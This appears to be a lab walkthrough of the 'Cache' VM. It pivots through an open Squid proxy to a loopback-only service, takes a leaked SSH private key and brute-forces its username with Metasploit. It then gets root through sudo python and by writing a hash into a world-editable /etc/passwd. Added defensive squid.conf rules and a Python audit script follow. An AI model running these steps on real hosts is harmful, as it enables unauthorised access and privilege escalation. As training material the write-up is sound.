# Lab setup
Download: Cache
NAT, IP: 192.168.1.152
# Penetration process
# Initial reconnaissance
```
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http       Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3128/tcp open  http-proxy Squid http proxy 5.7
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: squid/5.7
|_http-title: ERROR: The requested URL could not be retrieved
```
3128 is a proxy, so port 80 is presumably meant to be reached through it.
proxychains didn't work for some reason.
Port scan through the proxy instead:
```
┌──(root㉿kali)-[~]
└─# wfuzz -c --hc=400,403,503 -t 200 -z range,1-65535 -p 192.168.1.152:3128:HTTP http://127.0.0.1:FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:FUZZ/
Total requests: 65535

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000080:   200        368 L    933 W      10701 Ch    "80"
000021500:   200        22 L     40 W       325 Ch      "21500"

Total time: 90.54842
Processed Requests: 65535
Filtered Requests: 65533
Requests/sec.: 723.7563
```
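What the scan above relies on is a Squid instance that will forward client requests to its own loopback interface, exposing a service bound only to 127.0.0.1. As an added example (not the box's actual squid.conf), this is the access-control section a defender would expect; the `to_localhost` ACL is Squid's stock definition, and the client subnet is an assumption:

```conf
# Added example, not the target's configuration. The to_localhost ACL is the
# definition shipped in Squid's default squid.conf; localnet is an assumption.
acl localnet src 192.168.1.0/24
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl Safe_ports port 80 443
acl SSL_ports port 443
acl CONNECT method CONNECT

# Weak: any client may reach any destination, so the proxy becomes a pivot
# onto services bound to 127.0.0.1 (the FUZZ scan finds 21500 this way).
# http_access allow all

# Hardened: deny loopback and non-standard ports before allowing any client.
http_access deny to_localhost
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow localnet
http_access deny all
```

With this order in place, the proxy answers the same `http://127.0.0.1:FUZZ` probes with 403 for every port, and the `--hc=400,403,503` filter above would show nothing.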
Scan again through the proxy, this time for directories:
```
┌──(root㉿kali)-[~]
└─# wfuzz -c --hc=404 --hl=22 -t 200 -w /usr/share/seclists/Discovery/Web-Content/big.txt -p 192.168.1.152:3128:HTTP http://127.0.0.1:21500/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:21500/FUZZ
Total requests: 20476

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000004732:   301        7 L      11 W       169 Ch      "cloud"

Total time: 0
Processed Requests: 20476
Filtered Requests: 20475
Requests/sec.: 0
```
Scan again, inside `/cloud/`:
```
┌──(root㉿kali)-[~]
└─# wfuzz -c -p 192.168.1.152:3128 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u "http://127.0.0.1:21500/cloud/FUZZ" --hc=404,403
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:21500/cloud/FUZZ
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001690:   200        27 L     33 W       1675 Ch     "key"
```
Grab the key: `curl --proxy http://192.168.1.152:3128 http://127.0.0.1:21500/cloud/key > id_rsa`
Fire up msf to brute-force the username the key belongs to:
```
msf6 auxiliary(scanner/ssh/ssh_login_pubkey) > show options

Module options (auxiliary/scanner/ssh/ssh_login_pubkey):

   Name              Current Setting                                          Required  Description
   ----              ---------------                                          --------  -----------
   ANONYMOUS_LOGIN   false                                                    yes       Attempt to login with a blank username and password
   BRUTEFORCE_SPEED  5                                                        yes       How fast to bruteforce, from 0 to 5
   CreateSession     true                                                     no        Create a new session for every successful login
   DB_ALL_USERS      false                                                    no        Add all users in the current database to the list
   KEY_PASS                                                                   no        Passphrase for SSH private key(s)
   KEY_PATH          /root/id_rsa                                             no        Filename or directory of cleartext private keys. Filenames beginning with a dot, or ending in ".pub" will be skipped. Duplicate private keys will be ignored.
   PRIVATE_KEY                                                                no        The string value of the private key that will be used. If you are using MSFConsole, this value should be set as file:PRIVATE_KEY_PATH. OpenSSH, RSA, DSA, and ECDSA private keys are supported.
   RHOSTS            192.168.1.152                                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             22                                                       yes       The target port
   STOP_ON_SUCCESS   true                                                     yes       Stop guessing when a credential works for a host
   THREADS           20                                                       yes       The number of concurrent threads (max one per host)
   USERNAME                                                                   no        A specific username to authenticate as
   USER_FILE         /usr/share/wordlists/seclists/Usernames/Names/names.txt  no        File containing usernames, one per line
   VERBOSE           true                                                     yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.
```
One `run` and we have a session; the username is abraham.
Got a shell.
# Privilege escalation
Check `sudo -l`, then escalate straight to jeff with python: `sudo -u jeff python -c 'import pty; pty.spawn("/bin/bash")'`
Got jeff's shell.
An ACL check shows that passwd is writable by jeff: `find / -exec sh -c 'getfacl {} 2>/dev/null | grep -q "user:jeff" && echo {}' \; 2>/dev/null`
Generate a password hash: `openssl passwd '123456'`
Write it into the root entry of passwd, then `su` with that password and we have root.
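A defender's view of the two weaknesses this privilege escalation chains together, as an added example that is not part of the original writeup: a small Python audit that flags named-user or group write grants in `getfacl` output for /etc/passwd, and passwd entries whose password field holds a hash instead of the shadow marker (the trace left by writing `openssl passwd` output into the file) or that add a second UID 0 account. The getfacl and passwd text below are constructed samples.

```python
#!/usr/bin/env python3
# Added example, not from the original writeup. Parses text so it can run
# on captured output; on a live host feed it the output of
# `getfacl /etc/passwd` and the contents of /etc/passwd.
import re

# Constructed `getfacl /etc/passwd` output with a user-level write grant.
SAMPLE_GETFACL = """\
# file: etc/passwd
# owner: root
# group: root
user::rw-
user:jeff:rw-
group::r--
mask::rw-
other::r--
"""

# Constructed /etc/passwd excerpt: the root line carries an inline (fake)
# MD5-crypt hash instead of the 'x' that defers to /etc/shadow.
SAMPLE_PASSWD = """\
root:$1$XqzHnYKb$P5AbC1dEf2GhI3jKl4MnO.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
abraham:x:1000:1000::/home/abraham:/bin/bash
jeff:x:1001:1001::/home/jeff:/bin/bash
"""

def writable_acl_users(getfacl_text):
    """Named users/groups given write access through POSIX ACL entries."""
    grants = []
    for line in getfacl_text.splitlines():
        # Only named entries (user:NAME:perms); owner/mask/other are skipped.
        m = re.match(r"^(user|group):([^:]+):([rwx-]{3})$", line)
        if m and "w" in m.group(3):
            grants.append(f"{m.group(1)}:{m.group(2)}")
    return grants

def suspicious_passwd_entries(passwd_text):
    """Accounts whose password field is not a shadow marker, plus extra UID-0 accounts."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line, not a passwd record
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in ("x", "*", "!", "!!"):
            findings.append((name, "password hash stored in passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "additional UID 0 account"))
    return findings
```

Both checks are cheap enough to run from cron or a file-integrity hook; a write grant to /etc/passwd or a non-`x` root password field should never appear on a healthy Debian host.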